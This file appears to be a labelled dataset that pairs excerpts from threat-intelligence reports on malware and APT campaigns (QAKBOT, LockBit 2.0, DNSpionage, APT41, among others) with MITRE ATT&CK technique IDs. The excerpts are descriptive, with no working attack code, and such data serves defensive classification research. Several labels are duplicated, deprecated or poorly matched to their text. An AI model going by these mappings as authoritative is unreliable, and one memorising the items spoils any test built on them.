{"text1":"In November 2018, Cisco Talos published research on an attack campaign named DNSpionage. It involved attacks using malware to compromise individual endpoints, but most interestingly described an effort to specifically hijack DNS entries of government organizations to redirect visitors to likely malicious, adversary operated systems. Both FireEye and Crowdstrike followed up with their own assessments for the DNS hijacking efforts, and described operations extending back to January 2017. No attribution to any known adversary groups was provided, other than that the target radius was primarily in the Middle East and the adversary was also likely operating out of that region. ","labels":"['T1584.002', 'T1583.002', 'T1496', 'T1189']"}
|
|
{"text1":"Although the targeting profile is the same as the Russian banking cluster, the TTPs are very different. In particular, the use of tooling stands out from other clusters of CARBON SPIDER activity. As with other clusters, the primary infection vector is targeted spear phishing emails that use exploits for a variety of vulnerabilities in Microsoft Office:","labels":"['T1203', 'T1588.006', 'T1566']"}
|
|
{"text1":"1) Function similarity \u2013 Important functions in both BYEBY and wincore.dll have almost the same implementation. One such function is the payloads\u2019 main thread function.","labels":"['T1588.001', 'T1055.003']"}
|
|
{"text1":"Another indicator of a Qakbot infection is HTTPS traffic to cdn.speedof[.]me. The domain speedof[.]me is used by a legitimate Internet speed test service. Although this is not malicious traffic, we frequently see traffic to cdn.speedof[.]me during Qakbot infections. Figure 20 shows this activity from our pcap.","labels":"['T1090.004']"}
|
|
{"text1":"Malicious use of Responder was first publicly documented on August 11, 2017 as being used by APT28, also known as Fancy Bear. The tool was used against hotel visitors to spoof NetBios resources. Victims were coerced into connecting to UDP port 137 and disclosing credentials over SMB to APT28, which the threat actor then used to gain elevated access to the network.","labels":"['T1557.001', 'T1043', 'T1021.002']"}
|
|
{"text1":"With the amount of overlap between the other components in these separate campaigns, we decided to compare the Pirpi payloads delivered by the UPS group using CVE-2014-1776 and CVE-2015-3113. From here on, we will refer to these two payloads as Pirpi.2014 (CVE-2014-1776) and Pirpi.2015 (CVE-2015-3113), whose details are listed in Table 1. Unit 42 discovered several similarities between the two Pirpi variants, as well as a few equally important differences, both of which are worth discussing. We also compared the Pirpi.2014 and Pirpi.2015 payloads to other known Pirpi samples in an attempt to determine which variant they most closely resemble.","labels":"['T1588.006']"}
|
|
{"text1":"Next we compared the codebase for setting registry keys. The code reuse displayed in Figure 4 is the sequence that sets the IEHarden registry keys and other keys used throughout TidePool and Operation Ke3chang malware.","labels":"['T1547.001', 'T1112']"}
|
|
{"text1":"Another infamous banker Trojan, Kronos, caught up with Edge in 2016. We checked out its capabilities on a Windows 10 virtual machine. In the code of the new Kronos version we found a function that checks the name and checksum of a process, as well as the hashes of the functions hooked by the malware.","labels":"['T1056.004']"}
|
|
{"text1":"CARROTBALL, initially discovered in an attack during October 2019, is a simple FTP downloader utility which facilitates the installation of SYSCON, a full-featured Remote Access Trojan (RAT) which leverages FTP for Command and Control (C2). It was found embedded in a malicious Word document sent as a phishing lure to a US government agency and two non-US foreign nationals professionally associated with North Korea.","labels":"['T1059', 'T1566']"}
|
|
{"text1":"The success of the Dropping Elephant group is striking given that no zero-day exploits or advanced techniques were used to target high-profile victims \u2013 it\u2019s clear that by applying security updates and improving the security awareness of staff, the success of attacks like this can be prevented. At the start of the year we predicted that APT groups would invest less effort in developing sophisticated tools and make greater use of off-the-shelf malware. Dropping Elephant provides a further example of how low investment and use of ready-made toolsets can be very effective when combined with high quality social engineering.","labels":"['T1587.001']"}
|
|
{"text1":"In my previous blog, I noted that a variant of the Cerber downloader was seen using BITS for a brief period of time and 10 out of these 11 samples were Microsoft Word documents leading to Cerber.","labels":"['T1197']"}
|
|
{"text1":"In early 2015, a new Emotet modification was released, not all that different from the previous one. Among the changes were: new built-in public RSA key, most strings encrypted, ATS scripts for web injection cleared of comments, targets included clients of Swiss banks.","labels":"['T1592.004']"}
|
|
{"text1":"A C&C address (103.82.52[.]18) which was found in one of MosaicRegressor\u2019s variants (MD5:3B58E122D9E17121416B146DAAB4DB9D) was observed in use by the \u2018Winnti umbrella and linked groups\u2019, according to a publicly available report. Since this is the only link between our findings and any of the groups using the Winnti backdoor, we estimate with low confidence that it is indeed responsible for the attacks.","labels":"['T1587.001']"}
|
|
{"text1":"Both MPK variants include key loggers that are extremely similar in functionality in addition to having the same strings used for headers within the key log file. The MPK IRC Bot monitors active application windows and writes the title of the open window along with the logged keystrokes to a file at \u201c%temp%\\Save.tmp\u201d. The MPK Trojan also monitors specifically for windows that are likely to contain login forms for popular web-based email clients, such as titles that contain:","labels":"['T1554']"}
|
|
{"text1":"AveMaria is a new botnet, whose first version we found in September 2018, right after the arrests of the FIN7 members. We have medium confidence that this botnet falls under the FIN7 umbrella. In fact, AveMaria is a classic infostealer bot that collects all possible credentials from various types of software: browsers, email clients, messengers, etc., and can act as a keylogger. Since the beginning of 2019, we have collected more than 1300 samples and extracted more than 130 C2s.","labels":"['T1114', 'T1587.001']"}
|
|
{"text1":"MuddyWater has conducted various campaigns against entities spread throughout the U.S.A., Europe, Middle East and South Asia. A typical TTP employed by the group is the heavy use of scripting in their infection chains using languages like PowerShell and Visual Basic coupled with the frequent use of living-off-the-land binaries (LoLBins). Cisco Talos recently observed a campaign operated by MuddyWater targeting users in Turkey. This campaign consists of the use of malicious PDFs and Microsoft Office documents (maldocs) to serve as the initial infection vector. These maldocs were named in such a way as to masquerade as legitimate documents from the Turkish Health and Interior Ministries. Next, the malware executes a series of scripts deployed on the infected endpoint to serve as downloaders and instrumentors for additional payloads. We've also discovered the use of flags or tokens in attacks conducted by this threat actor in this campaign. These tokens are meant to signal a successful infection of a target by the group's malicious artifacts.","labels":"['T1203']"}
|
|
{"text1":"Pony is a popular downloader program that can download additional malware onto the infected system. It is also equipped with a number of plugins that may be used to steal stored credentials for various applications such as FTP clients, web browsers, email clients, and other software. Pony is also commonly known as Fareit.","labels":"['T1539', 'T1555']"}
|
|
{"text1":"In recent years, malware delivery mechanisms have changed from fixed media (diskettes) to email (e.g. the infamous LoveLetter email worm) and direct network attacks (e.g. CodeRed). The most recent step in the evolution process is a move to delivering malware via the world wide web.","labels":"['T1102']"}
|
|
{"text1":"We determined the string in the pre tags is the actor provided password, which the webshell uses as a key to decrypt the embedded payload. We determined this by following the process in which the TwoFace++ loader webshell uses the actor provided password to authenticate and decrypt the embedded webshell:","labels":"['T1552.004']"}
|
|
{"text1":"We found a Coinminer bundled with the legitimate installer of video conferencing app Zoom, luring users who want to install the software but end up unwittingly downloading a malicious file. The compromised files are not from Zoom\u2019s official download center, and are assumed to come from fraudulent websites. We have been working with Zoom to ensure that they are able to communicate this to their users appropriately.","labels":"['T1588.001', 'T1554', 'T1195.002', 'T1574.005']"}
|
|
{"text1":"In August 2019, FireEye released the \u201cDouble Dragon\u201d report on our newest graduated threat group, APT41. A China-nexus dual espionage and financially-focused group, APT41 targets industries such as gaming, healthcare, high-tech, higher education, telecommunications, and travel services. APT41 is known to adapt quickly to changes and detections within victim environments, often recompiling malware within hours of incident responder activity. In multiple situations, we also identified APT41 utilizing recently-disclosed vulnerabilities, often weaponizing and exploiting within a matter of days.","labels":"['T1595.002', 'T1046']"}
|
|
{"text1":"Most modifications of Trojan.Win32.Waldek are distributed via removable media and include functionality to collect information on infected systems and send it to the attackers. Based on the system data collected, the attackers create packages of additional malware to be installed on the infected system using the relevant Waldek functionality.","labels":"['T1025', 'T1543', 'T1005', 'T1091']"}
|
|
{"text1":"After decoding and decrypting with the XOR key \u201cDARKMATTER\u201d it gets the real C&C URL \u2018banhamm.com\u2019.","labels":"['T1140']"}
|
|
{"text1":"LockBit 2.0 is known for its extortion tactics, encrypting devices and demanding a ransom","labels":"['T1486', 'T1588.001']"}
|
|
{"text1":"Vidar can also receive settings from the C&C that tells it exactly what to do.","labels":"['T1588.001']"}
|
|
{"text1":"LockBit 2.0 enumerates system information such as hostname, shares, and domain information","labels":"['T1082']"}
|
|
{"text1":"Once deployed, Prestige ransomware payloads will drop ransom notes named \"README.txt\" in the root directory of each drive it encrypts.","labels":"['T1486']"}
|
|
{"text1":"The threat actor used RDP on Active Directory using leaked accounts. The actor dropped scanning tools, Nmap.exe and Nping.exe, for scanning the network. Next, the scheduled task was pushed by the group policy domain machine.","labels":"['T1484', 'T1053.005']"}
|
|
{"text1":"An attacker sends an e-mail with a malicious Tar archive attached.","labels":"['T1566.001', 'T1598.002']"}
|
|
{"text1":"QAKBOT can use VBS to download and execute malicious files","labels":"['T1588.001']"}
|
|
{"text1":"The PHP malware achieves persistence by adding scheduled tasks on the host to execute daily and at regular intervals. At the same time, a generated TMP file runs a parallel process to launch the stealer component.","labels":"['T1053', 'T1053.005']"}
|
|
{"text1":"Uses PowerShell to retrieve the malicious payload and download additional resources such as Mimikatz and Rclone.","labels":"['T1059.001', 'T1588.002']"}
|
|
{"text1":"The observed attack technique (OAT) detection indicates that the php-cgi process represents a \u201c\/bin\/bash\u201d shell and is directly reading \u201cpasswd\u201d, suggesting that the server might have been compromised","labels":"['T1059.004']"}
|
|
{"text1":"Uses BITSAdmin to download and install payloads.","labels":"['T1588.002']"}
|
|
{"text1":"Sideloading happens after the steps described earlier \u2014 the threat actor successfully exploited Log4j and downloaded mfeann.exe, LockDown.DLL, and c0000012.log.","labels":"['T1203']"}
|
|
{"text1":"This new version of SolidBit ransomware is a .NET compiled binary (Figure 7). After opening Runtime64.exe using the debugger and .NET assembly editor DnSpy, we found that this file was obfuscated","labels":"['T1027']"}
|
|
{"text1":"LockBit 2.0 has been seen using the PowerShell module InvokeGPUpdate to update the group policy.","labels":"['T1484.001', 'T1484.001']"}
|
|
{"text1":"Scheduled Task. It was quite common to see scheduled tasks used to create persistence for the ransomware executable, PsExec, and occasionally some defense evasion batch scripts.","labels":"['T1053.005']"}
|
|
{"text1":"Uses the chmod +x command to grant executable permissions to the ransomware.","labels":"['T1222.002']"}
|
|
{"text1":"Notably, one of the tools used in the attack exploited the CVE-2021-21551 vulnerability in a Dell driver in what was the first recorded abuse of this security flaw.","labels":"['T1211', 'T1190', 'T1588.006']"}
|
|
{"text1":"The ransomware payload is copied to the ADMIN$ share of a remote system, and Impacket is used to remotely create a Windows Scheduled Task on target systems to execute the payload","labels":"['T1021.002', 'T1053', 'T1053.005']"}
|
|
{"text1":"QAKBOT can maintain persistence by creating an auto-run Registry key","labels":"['T1547.001', 'T1587.001']"}
|
|
{"text1":"Ducktail has now replaced the older .NET Core information-stealing malware used in previous campaigns with one written in PHP.","labels":"['T1587.001']"}
|
|
{"text1":"The ProxyShell elevation of privilege on the Exchange PowerShell Backend (CVE-2021-34523), Windows Background Intelligent Transfer Service (BITS) improperly handling symbolic links (CVE-2020-0787), and abusing the CMSTPLUA COM interface have all been seen as methods of privilege escalation.","labels":"['T1068']"}
|
|
{"text1":"Deletes some of its files used during operations as part of cleanup, including removing applications such as 7z.exe, tor.exe, ssh.exe","labels":"['T1070.004']"}
|
|
{"text1":"Interestingly, the actors chose to leverage Cobalt Strike for lateral movement. The first of several beacon files are dropped onto the same infected endpoint running Brute Ratel C4, with the first being:","labels":"['T1588.002', 'T1588.001']"}
|
|
{"text1":"QAKBOT has gained execution through users opening malicious attachments","labels":"['T1204']"}
|
|
{"text1":"The malware will ultimately be extracted to the %LocalAppData%\\Packages\\PXT folder, which includes the PHP.exe local interpreter, various scripts used to steal information, and supporting tools, as shown below.","labels":"['T1059', 'T1588.001']"}
|
|
{"text1":"Amavis analyzes the e-mail attachments and inspects the contents of the attached archive. It invokes cpio and CVE-2015-1197 is triggered.","labels":"['T1566.001', 'T1546', 'T1588.006']"}
|
|
{"text1":"LockBit 2.0 has utilized a UAC bypass tool.","labels":"['T1548.002']"}
|
|
{"text1":"In some cases, LockBit 2.0 will limit the data transfer sizes to fly under the radar of any monitoring services a client may have set up.","labels":"['T1030', 'T1030']"}
|
|
{"text1":"The vulnerability tracked as CVE-2022-41352 is a remote code execution flaw that allows attackers to send an email with a malicious archive attachment that plants a web shell in the ZCS server while, at the same time, bypassing antivirus checks.","labels":"['T1505.003', 'T1566.001']"}
|
|
{"text1":"Cobalt Strike can use PsExec to execute a payload on a remote host. It can also use Service Control Manager to start new services","labels":"['T1569.002']"}
|
|
{"text1":"When neither of the previous commands is received, the message is taken as a command to be executed with cmd.exe. The output is sent to the server.","labels":"['T1059', 'T1202']"}
|
|
{"text1":"Both Advanced Port Scanner and NetScan have been used to discover local network infrastructure devices and services running on remote hosts. Active Directory queries for remote systems have been performed by ADFind.","labels":"['T1046', 'T1046']"}
|
|
{"text1":"QAKBOT has spread through emails with newly created malicious links.","labels":"['T1566.002']"}
|
|
{"text1":"Racealer (aka RaccoonStealer) is known to be a stealer-type malware that mostly extracts user credentials and exfiltrates data from compromised machines.","labels":"['T1552.001', 'T1588.001', 'T1020']"}
|
|
{"text1":"REvil reached its pinnacle of success in the first half of 2021, compromising thousands of companies in a Kaseya MSP supply-chain attack, demanding a $50 million payment from computer maker Acer, and extorting Apple using stolen blueprints of not-yet-released devices.","labels":"['T1588.001', 'T1189']"}
|
|
{"text1":"Executive: looks for a file with commands and executes them with cmd.exe. The output is saved to a file.","labels":"['T1059.003']"}
|
|
{"text1":"Uses Rundll32 to load and execute malicious DLL.","labels":"['T1218.011']"}
|
|
{"text1":"QAKBOT abuses Wscript to execute a Jscript file.","labels":"['T1059.007', 'T1587.001']"}
|
|
{"text1":"QAKBOT uses obfuscation across two script files, a JavaScript (.js) file and a Batch Script (.cmd) file, likely in an effort to conceal suspicious-looking command lines. ","labels":"['T1059', 'T1059.007', 'T1059.003', 'T1027']"}
|
|
{"text1":"Just six minutes after the initial C&C communication, and with the QAKBOT malware now running inside an injected process (wermgr.exe), automated reconnaissance in the infected environment is performed via the execution of multiple built-in command line tools","labels":"['T1055']"}
|
|
{"text1":"Initial QAKBOT .zip file bypasses some antivirus detections due to password protections.","labels":"['T1140', 'T1588.001']"}
|
|
{"text1":"Cobalt Strike can use rundll32.exe to load DLL from the command line","labels":"['T1218.011']"}
|
|
{"text1":"In rare cases, LockBit 2.0 has been observed to create accounts for persistence with simple names, such as \u201ca.\u201d","labels":"['T1136.001']"}
|
|
{"text1":"Vulnerabilities such as ProxyShell (CVE-2021-34473) and improper SQL sanitization (CVE-2021-20028) have been observed being utilized as footholds into the environment.","labels":"['T1588.006', 'T1190']"}
|
|
{"text1":"LockBit 2.0 is typically executed via command line arguments via a hidden window. Windows Sysinternals PsExec has been utilized for both persistence and execution purposes. Its ability to execute processes on other systems spread the ransomware and assisted in reconnaissance activities.","labels":"['T1059']"}
|
|
{"text1":"As seen with other ransomware cases, Mimikatz is a key player in dumping credentials but LockBit 2.0 has been occasionally seen utilizing MiniDump as well.","labels":"['T1003', 'T1003']"}
|
|
{"text1":"QAKBOT can inject itself into processes like wermgr.exe","labels":"['T1055']"}
|
|
{"text1":"LockBit 2.0 has been known to self-propagate via SMB.","labels":"['T1021.002', 'T1021.002']"}
|
|
{"text1":"Scheduled Task. LockBit 2.0 can be executed via scheduled tasks.","labels":"['T1053.005']"}
|
|
{"text1":"There is a command ftpversion that uploads the version of the backdoor (hardcoded) to a file `ver.txt` on the FTP server, in the root folder for the target.","labels":"['T1059', 'T1105']"}
|
|
{"text1":"In early February 2022, we witnessed an intrusion employing Gootloader (aka GootKit) as the initial access vector. The intrusion lasted two days and comprised discovery, persistence, lateral movement, collection, defense evasion, credential access and command and control activity. During the post-exploitation phase, the threat actors used RDP, WMI, Mimikatz, Lazagne, \u2026","labels":"['T1588.001']"}
|
|
{"text1":"2. The perpetrators distributed PlugX messages to employees\u2019 personal addresses, claiming to come from fellow members of staff. The letters contained photos of alleged senders. Along with the photos, all the information about personal mailboxes could have been collected during the group\u2019s initial presence on corporate workstations.","labels":"['T1114', 'T1598']"}
|
|
{"text1":"Androrat is an open source remote management tool developed by a team of four for a university project. Open source code was uploaded to the GitHub website in 2012. It is a remote management tool that allows remote control of mobile devices using a computer.","labels":"['T1588.001']"}
|
|
{"text1":"Office documents, databases, archives, and multimedia files are the usual file types targeted by ransomware. It\u2019s the same for this version of Erebus, which encrypts 433 file types. However, the ransomware appears to be coded mainly for targeting and encrypting web servers and data stored in them.","labels":"['T1486']"}
|
|
{"text1":"In the initial phases, the Sunburst malware talks to the C&C server by sending encoded DNS requests. These requests contain information about the infected computer; if the attackers deem it interesting enough, the DNS response includes a CNAME record pointing to a second level C&C server.","labels":"['T1583.002']"}
|
|
{"text1":"A few minutes after the initial execution, BazarLoader ran some discovery tasks using the built in Microsoft net and nltest utilities and transferred the results over the C2 channel.","labels":"['T1041']"}
|
|
{"text1":"When executed, the final macro code as interpreted by CMD decodes into a classic PowerShell download cradle that fetches the initial QakBot payload. There is one last bit of obfuscation here as the script does contain two more encoded strings. One is the URL as seen above in Figure 8, and another is the full path to which the payload will initially be written: \u201cC:\\Users\\Public\\tmpdir\\file\u201d.\u00a0","labels":"['T1059', 'T1059.001']"}
|
|
{"text1":"The attackers have also used file names and export API names in the CRAT DLLs to masquerade the RAT as a benign application's library. Some examples of the exported function names are:","labels":"['T1140']"}
|
|
{"text1":"Samples associated with either RedAlpha campaign remain quite rare, with less than 20 samples identified across the two campaigns. Custom samples are coded in C++. The 2018 dropper relied on a rare C++ cross-platform framework called Haxe to string together pieces of publicly available source code largely found in Chinese-language forums and blogs.","labels":"['T1587.001']"}
|
|
{"text1":"Through manual reverse engineering, we were able to extract the main malicious Python modules from the Xbash executables and decompile them successfully. Therefore, in the later sections of this analysis, we show the Python source code.","labels":"['T1059.006']"}
|
|
{"text1":"The sample was first uploaded to VT on 2018-10-12 from Ukraine. It exhibits an encoding and a code style that are similar to those used by former series of Hades droppers. Nevertheless, it introduces new features like anti-analysis and delayed execution, which were only used by the second stage payload in the past.","labels":"['T1587.001']"}
|
|
{"text1":"This resembled the server-side ASPX payload of the China Chopper webshell documented previously. Uploads to VirusTotal in late August 2018 resembling the same filename, iisstart.aspx, indicate the deployed webshell was likely a version of the China Chopper webshell known to have been used by several Chinese threat actors.","labels":"['T1588.001']"}
|
|
{"text1":"If we look historically, BelialDemon has been involved in the development of malware loaders. BelialDemon is considered the primary developer of TriumphLoader, a loader previously posted about on several forums, and has experience with selling this type of malware.","labels":"['T1588.001']"}
|
|
{"text1":"FireEye\u2019s blog, \u201cHighly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims with SUNBURST Backdoor,\u201d contains a wealth of useful information, all of which has been analyzed by Unit 42 researchers to help ensure Palo Alto Networks customers are protected.","labels":"['T1195']"}
|
|
{"text1":"Towards the end of July, we observed an intrusion that began with IcedID malware and ended in XingLocker ransomware, a Mountlocker variant. XingLocker made its first appearance in early May of this year. The new group was featured in the AstroLocker ransomware blog, and it has been very active since then.","labels":"['T1588.001']"}
|
|
{"text1":"XLoader sets up an auto start by creating a new file with a random name in the LaunchAgents folder of the current user:","labels":"['T1543.001']"}
|
|
{"text1":"In 2014, a European corporation was compromised prior to constructing a manufacturing facility in Vietnam. In 2016, Vietnamese and foreign-owned corporations working in network security, technology infrastructure, banking, and media industries were targeted. In mid-2016, malware that FireEye believes to be unique to APT32 was detected on the networks of a global hospitality industry developer with plans to expand operations into Vietnam. From 2016 through 2017, two subsidiaries of U.S. and Philippine consumer products corporations, located inside Vietnam, were the target of APT32 intrusion operations.","labels":"['T1587.001']"}
|
|
{"text1":"SPLM, otherwise known as CHOPSTICK, or by the author(s) as \u201cXAgent\u201d, is described as Sofacy\u2019s signature second stage tool, selectively used for years against around the world. Really, many modified XAgent modules have been deployed over the years. Even the individual Linux modules renamed as \u201cFysbis\u201d backdoors released in 2016 were merely modified and reduced portions of recompiled XAgent C\/C++ codebase. Anyway, SPLM\/CHOPSTICK has maintained various combinations of code, with some recognizable functionality listed here.","labels":"['T1587.001']"}
|
|
{"text1":"The first versions of these new USB stealer modules appeared around February 2015 and the latest appear to have been compiled in May 2015. Older versions of these USBSTEALER modules were previously described by our colleagues from ESET.","labels":"['T1587.001']"}
|
|
{"text1":"SpyNote is similar to Droidjack and is also a commercial RAT. It is powerful and provides convenient management tools. At present, the price of different versions on the official website is $499 and $4000 respectively.","labels":"['T1588.001']"}
|
|
{"text1":"While investigating some malicious activity in Central Asia, we identified a new backdoor, named Tunnus, which we attribute to Turla. This is .NET-based malware with the ability to run commands or perform file actions on an infected system and send the results to its C2. So far, the threat actor has built its C2 infrastructure with vulnerable WordPress installations.","labels":"['T1587.001']"}
|
|
{"text1":"Once the second stage is extracted and run, we are presented with the final stage of this attack, which we refer to as ComboJack. Once ComboJack is extracted it begins by copying itself to the following location:","labels":"['T1587.001']"}
|
|
{"text1":"In order to \u201csteal\u201d cryptocurrency from a victim, WeSteal uses regular expressions to look for strings matching the patterns of Bitcoin and Ethereum wallet identifiers being copied to the clipboard. When it matches these, it replaces the copied wallet ID in the clipboard with one supplied by the malware. The victim then pastes the substituted wallet ID for a transaction, and the funds are sent instead to the substitute wallet.","labels":"['T1115']"}
|
|
{"text1":"Spora ransomware, which began circulating in January of this year, is a ransomware noted for its sophistication, including top-notch customer support to victims, and was likely created by professional malicious actors.","labels":"['T1588.001']"}
|
|
{"text1":"Earlier in the year, as part of an incident response investigation, we uncovered a new version of the Skimer ATM malware. The malware, which first surfaced in 2009, has been re-designed. So too have the tactics of the cybercriminals using it. The new ATM infector has been targeting ATMs around the world, including the UAE, France, the United States, Russia, Macau, China, the Philippines, Spain, Germany, Georgia, Poland, Brazil and the Czech Republic.","labels":"['T1587.001']"}
|
|
{"text1":"FormBook authors did some rewrites on the original exploit, taking as their initial codebase the one that we and Microsoft observed as deploying Cobalt Strike beacons. The exploited vulnerability is CVE-2021-40444. However, since the vulnerability itself has been analyzed already, here we focus on describing some of the unique changes made by FormBook.","labels":"['T1203']"}
|
|
{"text1":"The 2019 Linux variant of the GoldMax backdoor is almost identical in functionality and implementation to the previously identified May 2020 Windows variant. The very few additions to the backdoor between 2019 and 2020 likely reflect its maturity and longstanding evasion of detections. It is likely GoldMax has been used as a long-term persistence backdoor during StellarParticle-related compromises, which would be consistent with the few changes made to the malware to modify existing functions or support additional functionality.","labels":"['T1587.001']"}
|
|
{"text1":"Elknot, also known as BillGates, is a very long-lived and active DDoS botnet which targeted Linux systems and was later ported to the Windows platform[4]. Now we see Elknot setting its foot on both platforms for this vulnerability, and sharing the same C2.","labels":"['T1584.005']"}
|
|
{"text1":"Janicab\u2019s features also remind us of Powersing\u2019s: the sample contains VM detection based on the MAC address of the machine, looks for malware analysis programs and has familiar antivirus software evasion routines. Janicab also periodically sends screenshot captures of the victim\u2019s desktop to the C&C and appears to enable the execution of arbitrary Python scripts.","labels":"['T1113', 'T1497', 'T1059.006']"}
|
|
{"text1":"Functionally, Gauss is designed to collect as much information about infected systems as possible, as well as to steal credentials for various banking systems and social network, email and IM accounts. The Gauss code includes commands to intercept data required to work with several Lebanese banks \u2013 for instance, Bank of Beirut, Byblos Bank, and Fransabank.","labels":"['T1114', 'T1082']"}
|
|
{"text1":"GandCrab 2 is far from a merely repackaged GandCrab 1. It contains fixes for several flaws in the original, including one critical encryption flaw that would have trivially allowed a universal decryptor (more on this below).","labels":"['T1587.001']"}
|
|
{"text1":"The main loader and privilege escalation tool, \u201cautorun.exe\u201d fires up a special dropper, which is actually an Equation Group DoubleFantasy implant installer. The installer is stored as \u201cshow.dll\u201d in the \u201cPresentation\u201d folder of the CDROM.","labels":"['T1068']"}
|
|
{"text1":"Unlike the original geacon, Blackrota uses gobfuscate to obfuscate the source code before compiling. gobfuscate is an open-source tool for Go code obfuscation, which can obfuscate the following elements of Go source code with random character substitutions:","labels":"['T1001']"}
|
|
{"text1":"As the Top Twenty shows, DNSChanger is also widespread. There is actually a connection between Zlob and DNSChanger \u2013 we believe they were created by the same gang. Although DNSChanger underwent many changes during its lifespan, basically what it does is simply change the DNS servers from the user\u2019s computer to a set of two specific IP addresses. The IP addresses are selected from a huge pool and the variation comes in distributing thousands of different DNSChanger binaries, each one setting the DNS servers to distinct IP addresses. While changing the DNS servers may not be regarded as something seriously malicious, an attacker who achieves this can actually do a lot of harm \u2013 for instance, redirecting websites such as Amazon.com or Bank Of America to phishing installations almost entirely without any sign of warning to the user. To complicate removal, the most recent DNSChangers include rootkit components and even download additional malware.","labels":"['T1014']"}
|
|
{"text1":"The group\u2019s arsenal at that point included multiple Trojans and tools for Windows and macOS. In 2015, the actors started to expand their espionage efforts from PCs to mobile devices using the spyware called MobileOrder, which focused on compromising Android devices. Based on the code similarity, shared infrastructure and victimology, we conclude that the new wave of attacks belongs to the same threat actor and that the group continues to deploy and develop MobileOrder malware until this day. In addition to clear code overlaps, we observed multiple overlaps in the infrastructure between the new samples and the old MobileOrder malware variant, as well as multiple variants of Windows Psylo Trojan previously attributed to Scarlet Mimic, that interact with the same malicious domains as the mobile malware.","labels":"['T1587.001']"}
|
|
{"text1":"The downloader\u2019s process termination starts with killing the DDG Monero miner botnet client if present on the system, followed by a variety of other cryptominers, including other XMRig instances. This behavior is indicative of attempting to secure more host resources from competing miners. The malware also targets services belonging to Qihoo 360, an antivirus service, in order to reduce the chance of detection. However, taskkill is unable to kill processes related to Qihoo 360. Figure 5 shows the processes that the script attempts to terminate.","labels":"['T1057', 'T1518.001']"}
|
|
{"text1":"The NOKKI payload is written to %LOCALAPPDATA%\\MicroSoft Updatea\\svServiceUpdate.exe prior to being executed in a new process. Persistence is achieved by writing the file path to the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\svstartup registry key.","labels":"['T1547.001']"}
|
|
{"text1":"In 2018 Intezer covered Foudre version 8, which contained a certain sample labeled unknown binary that was not explored in Intezer\u2019s research. In fact, this was a new component \u2014 called Tonnerre \u2014 which was a new step in the evolution of Infy, and contained various functionality absent from Foudre alone.","labels":"['T1587.001']"}
|
|
{"text1":"The BazarLoader ISO downloaded from the OneDrive link consists of a malicious DLL and shortcut file named \u201cDocuments.lnk\u201d which executes the DLL via rundll32.exe.","labels":"['T1218.011']"}
|
|
{"text1":"The last type of shellcode is a Cobalt Strike stager. We have confirmed the use of several different Cobalt Strike stager shellcodes since October 2019. In addition, some of the observed Cobalt Strike stager samples included a setting in the HTTP header of their malicious communications to disguise them as a common jQuery request in order to evade detection by security products.","labels":"['T1588.001']"}
|
|
{"text1":"FIN13 rolled many of these reconnaissance efforts into scripts to automate their processes. For example, they used pi.bat to iterate through a list of IP addresses in a file, execute a ping command and write the output to a file (Figure 6). A similar script used dnscmd to export a host\u2019s DNS zones to a file.","labels":"['T1595.001', 'T1059.003']"}
|
|
{"text1":"The executable dispci.exe appears to be derived from the code base of the legitimate utility DiskCryptor. It acts as the disk encryption module which also installs the modified bootloader and prevents the normal boot-up process of the infected machine.","labels":"['T1561.002']"}
|
|
{"text1":"After the botnets of direct ZeuS successors were taken down, Dridex\u2019s time came. This malware is a result of Bugat evolution (which appeared in 2010). Bugat v5 was recognized as Dridex in 2014.","labels":"['T1587.001']"}
|
|
{"text1":"The injected wermgr.exe process then creates a new folder in the user\u2019s AppData directory. As typically seen in Trickbot infections, it drops a copy of itself into this folder along with its encrypted config (settings.ini) and a batch file (launcher.bat).\u00a0","labels":"['T1055']"}
|
|
{"text1":"A sample of the data that is encrypted and sent to the CnC server for version \u2018p=2\u2019 is seen in the memory dump shown in Figure 6. At offset 4-7 it contains a time-based counter. It uses the keyword \"osamu\" in this instance to identify this particular campaign. The campaign keywords are not sent out in version \u2018p=1\u2019 but can still be found hardcoded in the DLL payload. The hostname and OS information are also included in the beacon. It awaits further commands from the CnC server in response to the data sent out.","labels":"['T1082']"}
|
|
{"text1":"The dropper extracts the communications and wiper components from resources named \u201cPKCS7\u201d and \u201cPKCS12\u201d respectively, while the x86 sample extracts the x64 variant of Disttrack from a resource named \u201cX509\u201d. To extract the components, the dropper is configured to seek specific offsets within the resource, read a specified number of bytes and decrypt the contents using a specified key. The key exists in the sample as a base64 encoded string that the dropper will decode then use each byte of the resulting string to XOR the data obtained from the resource. When determining the location of the ciphertext within the resource, the dropper subtracts 14 from the offset value in the sample\u2019s configuration as an additional layer of obfuscation. Table 1 shows the resources within the Disttrack x86 sample, the component it contains and the values needed to decrypt its contents.","labels":"['T1132']"}
|
|
{"text1":"It appears Russian cyber criminals were equally perplexed by the WCry campaign as the rest of the world. One of the members of the popular underground community complained about the recently purchased Virtual Private Server (VPS) which was almost immediately infected by ransomware even before the system update was completed.","labels":"['T1584.003']"}
|
|
{"text1":"Cutwail spam levels in the last three months have been significantly lower. The introduction of steganography may suggest that NARWHAL SPIDER has been developing new, innovative methods to evade detection and improve infection rates. Although not commonly used by eCrime actors, steganography has been used for malware delivery in the past, such as the Lurk Downloader and StegoLoader.","labels":"['T1027.003', 'T1001.002']"}
|
|
{"text1":"BokBot achieves malicious payload execution by abusing a renamed copy of the legitimate WMIC utility, which will execute a XSL script file. The entire process is outlined below.","labels":"['T1220']"}
|
|
{"text1":"A modified EternalBlue exploit, also used by WannaCry. The EternalRomance exploit \u2013 a remote code execution exploit targeting Windows XP to Windows 2008 systems over TCP port 445 (Note: patched with MS17-010). An attack against the update mechanism of a third-party Ukrainian software product called MeDoc.","labels":"['T1203']"}
|
|
{"text1":"The malicious library completes malware installation. Specifically, it creates a registry value responsible for automatically running RMS at system startup. Notably, in most cases of this campaign the registry value is placed in the RunOnce key, instead of the Run key, enabling the malware to run automatically only the next time the system starts up. After that, the malware needs to create the registry value again.","labels":"['T1547.001', 'T1547.001']"}
|
|
{"text1":"The SLUB backdoor is a custom one written in the C++ programming language, statically linking curl library to perform multiple HTTP requests. Other statically-linked libraries are boost (for extracting commands from gist snippets) and JsonCpp (for parsing slack channel communication).","labels":"['T1587.001']"}
|
|
